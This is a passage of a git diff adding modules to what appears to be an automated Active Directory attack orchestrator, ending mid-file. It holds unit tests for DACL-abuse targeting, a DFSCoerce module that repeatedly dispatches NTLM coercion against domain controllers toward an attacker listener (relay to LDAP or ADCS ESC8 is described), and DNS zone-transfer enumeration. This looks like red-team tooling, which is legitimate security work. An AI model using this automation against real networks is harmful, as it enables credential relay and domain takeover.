+ let mut da = make_credential("admin", "contoso.local");
+ da.is_admin = true;
+ state.credentials.push(da);
+ state.domain_sids.insert(
+ "contoso.local".to_string(),
+ "S-1-5-21-111-222-333".to_string(),
+ );
+ let details = acl_details("S-1-5-21-111-222-333-519", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-sid-001", "GenericAll", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].vuln_type, "genericall");
+ // source_user must be the resolved cred's SAM, not the raw SID — the
+ // credential_resolver looks up password by `(username, domain)`, and
+ // a SID never matches a credential record.
+ assert_eq!(work[0].source_user, "admin");
+ }
+
+ #[tokio::test]
+ async fn collect_sid_source_non_privileged_rid_skipped() {
+ // Only well-known privileged RIDs are auto-resolved; an arbitrary
+ // user SID (RID >= 1000) requires an exact match.
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ let mut da = make_credential("admin", "contoso.local");
+ da.is_admin = true;
+ state.credentials.push(da);
+ state.domain_sids.insert(
+ "contoso.local".to_string(),
+ "S-1-5-21-111-222-333".to_string(),
+ );
+ let details = acl_details("S-1-5-21-111-222-333-1105", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-sid-002", "GenericAll", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_write_membership_produces_work() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("user1", "contoso.local"));
+ let details = acl_details("user1", "Domain Admins", "contoso.local");
+ let vuln = make_vuln("vuln-wm-001", "write_membership", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].vuln_type, "write_membership");
+ }
+
+ #[tokio::test]
+ async fn collect_non_acl_vuln_skipped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let details = acl_details("admin", "dc01", "contoso.local");
+ let vuln = make_vuln("vuln-smb-001", "smb_signing_disabled", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_already_exploited_skipped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-002", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ state
+ .exploited_vulnerabilities
+ .insert("vuln-fcp-002".to_string());
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_already_processed_dedup_skipped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-003", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ state.mark_processed(DEDUP_DACL_ABUSE, "dacl:vuln-fcp-003".to_string());
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_source_user_empty_skipped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let mut details = HashMap::new();
+ details.insert("target".to_string(), serde_json::json!("victim"));
+ let vuln = make_vuln("vuln-fcp-004", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_no_matching_credential_skipped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("otheruser", "contoso.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-005", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_case_insensitive_credential_match() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("Admin", "CONTOSO.LOCAL"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-006", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].source_user, "admin");
+ }
+
+ #[tokio::test]
+ async fn collect_dc_ip_resolved_from_domain_controllers() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ state
+ .domain_controllers
+ .insert("contoso.local".to_string(), "192.168.58.10".to_string());
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-007", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ }
+
+ #[tokio::test]
+ async fn collect_dc_ip_empty_when_no_dc_mapping() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-008", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dc_ip, "");
+ }
+
+ #[tokio::test]
+ async fn collect_credential_domain_mismatch_skipped() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "fabrikam.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-fcp-009", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_empty_source_domain_matches_any_cred_domain() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "fabrikam.local"));
+ let mut details = HashMap::new();
+ details.insert("source".to_string(), serde_json::json!("admin"));
+ details.insert("target".to_string(), serde_json::json!("victim"));
+ let vuln = make_vuln("vuln-fcp-010", "ForceChangePassword", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[tokio::test]
+ async fn collect_multiple_vulns_produces_multiple_work_items() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+
+ for (i, vtype) in ["ForceChangePassword", "GenericAll", "WriteDacl"]
+ .iter()
+ .enumerate()
+ {
+ let details = acl_details("admin", &format!("target{i}"), "contoso.local");
+ let vuln = make_vuln(&format!("vuln-multi-{i}"), vtype, details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 3);
+ }
+
+ #[tokio::test]
+ async fn collect_dedup_key_format_matches() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let details = acl_details("admin", "victim", "contoso.local");
+ let vuln = make_vuln("vuln-dk-001", "GenericAll", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "dacl:vuln-dk-001");
+ }
+
+ #[tokio::test]
+ async fn collect_source_user_fallback_to_from_key() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("svc_account", "contoso.local"));
+ let mut details = HashMap::new();
+ details.insert("from".to_string(), serde_json::json!("svc_account"));
+ details.insert("target".to_string(), serde_json::json!("victim"));
+ details.insert(
+ "source_domain".to_string(),
+ serde_json::json!("contoso.local"),
+ );
+ let vuln = make_vuln("vuln-from-001", "GenericWrite", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].source_user, "svc_account");
+ }
+
+ #[tokio::test]
+ async fn collect_target_user_fallback_to_target_user_key() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .credentials
+ .push(make_credential("admin", "contoso.local"));
+ let mut details = HashMap::new();
+ details.insert("source".to_string(), serde_json::json!("admin"));
+ details.insert(
+ "target_user".to_string(),
+ serde_json::json!("fallback_target"),
+ );
+ details.insert(
+ "source_domain".to_string(),
+ serde_json::json!("contoso.local"),
+ );
+ let vuln = make_vuln("vuln-tu-001", "WriteDacl", details);
+ state
+ .discovered_vulnerabilities
+ .insert(vuln.vuln_id.clone(), vuln);
+ }
+
+ let state = shared.read().await;
+ let work = collect_dacl_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_user, "fallback_target");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/dfs_coercion.rs b/ares-cli/src/orchestrator/automation/dfs_coercion.rs
new file mode 100644
index 00000000..ad9bc889
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/dfs_coercion.rs
@@ -0,0 +1,450 @@
+//! auto_dfs_coercion -- trigger DFSCoerce (MS-DFSNM) NTLM coercion against DCs.
+//!
+//! DFSCoerce abuses the MS-DFSNM protocol (Distributed File System Namespace
+//! Management) to force a DC to authenticate to an attacker listener. Unlike
+//! PetitPotam, DFSCoerce requires valid domain credentials but works on
+//! systems where PetitPotam's unauthenticated path has been patched.
+//!
+//! The captured NTLM auth can be relayed to LDAP (shadow creds, RBCD) or
+//! ADCS web enrollment (ESC8).
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect DFS coercion work items from current state.
+///
+/// Pure logic extracted from `auto_dfs_coercion` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_dfs_coercion_work(state: &StateInner, listener: &str) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ if dc_ip.as_str() == listener {
+ continue;
+ }
+
+ let dedup_key = format!("dfs_coerce:{dc_ip}");
+ if state.is_processed(DEDUP_DFS_COERCION, &dedup_key) {
+ continue;
+ }
+
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .or_else(|| state.credentials.first())
+ {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(DfsWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ listener: listener.to_string(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Dispatches DFSCoerce against each DC that hasn't been DFS-coerced.
+/// Interval: 45s.
+pub async fn auto_dfs_coercion(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("dfs_coercion") {
+ continue;
+ }
+
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => continue,
+ };
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_dfs_coercion_work(&state, &listener)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "dfs_coercion",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "listener_ip": item.listener,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("dfs_coercion");
+ match dispatcher
+ .throttled_submit("coercion", "coercion", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "DFSCoerce (MS-DFSNM) coercion dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_DFS_COERCION, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_DFS_COERCION, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(dc = %item.dc_ip, "DFSCoerce task deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch DFSCoerce");
+ }
+ }
+ }
+ }
+}
+
+struct DfsWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ listener: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+ use ares_core::models::Credential;
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("dfs_coerce:{}", "192.168.58.10");
+ assert_eq!(key, "dfs_coerce:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_DFS_COERCION, "dfs_coercion");
+ }
+
+ #[test]
+ fn skips_self_listener() {
+ let dc_ip = "192.168.58.50";
+ let listener = "192.168.58.50";
+ assert_eq!(dc_ip, listener, "DC IP matching listener should be skipped");
+
+ let dc_ip2 = "192.168.58.10";
+ assert_ne!(dc_ip2, listener, "Different IP should not be skipped");
+ }
+
+ #[test]
+ fn payload_structure_validation() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let payload = serde_json::json!({
+ "technique": "dfs_coercion",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "listener_ip": "192.168.58.50",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+
+ assert_eq!(payload["technique"], "dfs_coercion");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["listener_ip"], "192.168.58.50");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "testuser".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let work = DfsWork {
+ dedup_key: "dfs_coerce:192.168.58.10".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ listener: "192.168.58.50".into(),
+ credential: cred,
+ };
+
+ assert_eq!(work.dedup_key, "dfs_coerce:192.168.58.10");
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.listener, "192.168.58.50");
+ assert_eq!(work.credential.username, "testuser");
+ }
+
+ #[test]
+ fn self_targeting_prevention() {
+ let listener = "192.168.58.50";
+ let dc_ips = ["192.168.58.10", "192.168.58.50", "192.168.58.20"];
+
+ let non_self: Vec<&&str> = dc_ips.iter().filter(|ip| **ip != listener).collect();
+
+ assert_eq!(non_self.len(), 2);
+ assert!(!non_self.contains(&&"192.168.58.50"));
+ assert!(non_self.contains(&&"192.168.58.10"));
+ assert!(non_self.contains(&&"192.168.58.20"));
+ }
+
+ #[test]
+ fn domain_extraction_for_credential_match() {
+ let domain = "contoso.local";
+ let cred_domain = "CONTOSO.LOCAL";
+ assert_eq!(
+ cred_domain.to_lowercase(),
+ domain.to_lowercase(),
+ "Domain matching should be case-insensitive"
+ );
+
+ let domain2 = "fabrikam.local";
+ assert_ne!(
+ cred_domain.to_lowercase(),
+ domain2.to_lowercase(),
+ "Different domains should not match"
+ );
+ }
+
+ // --- collect_dfs_coercion_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_dcs_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_dc_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "dfs_coerce:192.168.58.10");
+ assert_eq!(work[0].listener, "192.168.58.50");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_skips_dc_matching_listener() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.50".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_DFS_COERCION, "dfs_coerce:192.168.58.10".into());
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_multiple_dcs_produces_work_for_each() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 2);
+ let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"fabrikam.local"));
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "crossuser");
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed_keeps_unprocessed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_DFS_COERCION, "dfs_coerce:192.168.58.10".into());
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "fabrikam.local");
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_dfs_coercion_work(&state, "192.168.58.50");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/dns_enum.rs b/ares-cli/src/orchestrator/automation/dns_enum.rs
new file mode 100644
index 00000000..8d3e5bc7
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/dns_enum.rs
@@ -0,0 +1,398 @@
+//! auto_dns_enum -- DNS zone transfer and record enumeration.
+//!
+//! Attempts AXFR zone transfers and enumerates DNS records (SRV, A, CNAME)
+//! from each discovered DC. DNS records reveal additional hosts, services,
+//! and naming conventions that port scanning alone may miss.
+//!
+//! Zone transfers are often allowed from domain-joined machines, and even
+//! when blocked, DNS SRV record enumeration reveals AD-registered services
+//! (e.g., _msdcs, _kerberos, _ldap, _gc, _http).
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect DNS enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_dns_enum` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_dns_enum_work(state: &StateInner) -> Vec {
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("dns_enum:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_DNS_ENUM, &dedup_key) {
+ continue;
+ }
+
+ // DNS enum can work without creds (zone transfer, SRV queries)
+ // but we pass creds if available for authenticated queries
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| !c.password.is_empty() && c.domain.to_lowercase() == domain.to_lowercase())
+ .cloned();
+
+ items.push(DnsEnumWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// DNS enumeration per domain.
+/// Interval: 45s.
+pub async fn auto_dns_enum(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("dns_enum") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_dns_enum_work(&state)
+ };
+
+ for item in work {
+ let mut payload = json!({
+ "technique": "dns_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ });
+
+ if let Some(ref cred) = item.credential {
+ payload["credential"] = json!({
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ });
+ }
+
+ let priority = dispatcher.effective_priority("dns_enum");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "DNS enumeration dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_DNS_ENUM, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_DNS_ENUM, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "DNS enumeration deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch DNS enumeration");
+ }
+ }
+ }
+ }
+}
+
+struct DnsEnumWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: Option,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("dns_enum:{}", "contoso.local");
+ assert_eq!(key, "dns_enum:contoso.local");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("dns_enum:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "dns_enum:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_DNS_ENUM, "dns_enum");
+ }
+
+ #[test]
+ fn no_cred_required() {
+ // DNS enum works without credentials for zone transfer / SRV queries
+ let cred: Option = None;
+ assert!(cred.is_none());
+ }
+
+ #[test]
+ fn payload_without_cred() {
+ let payload = serde_json::json!({
+ "technique": "dns_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ });
+ assert!(payload.get("credential").is_none());
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let payload = serde_json::json!({
+ "technique": "dns_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ });
+ assert_eq!(payload["technique"], "dns_enumeration");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn payload_with_credential() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let mut payload = serde_json::json!({
+ "technique": "dns_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ });
+ payload["credential"] = serde_json::json!({
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ });
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
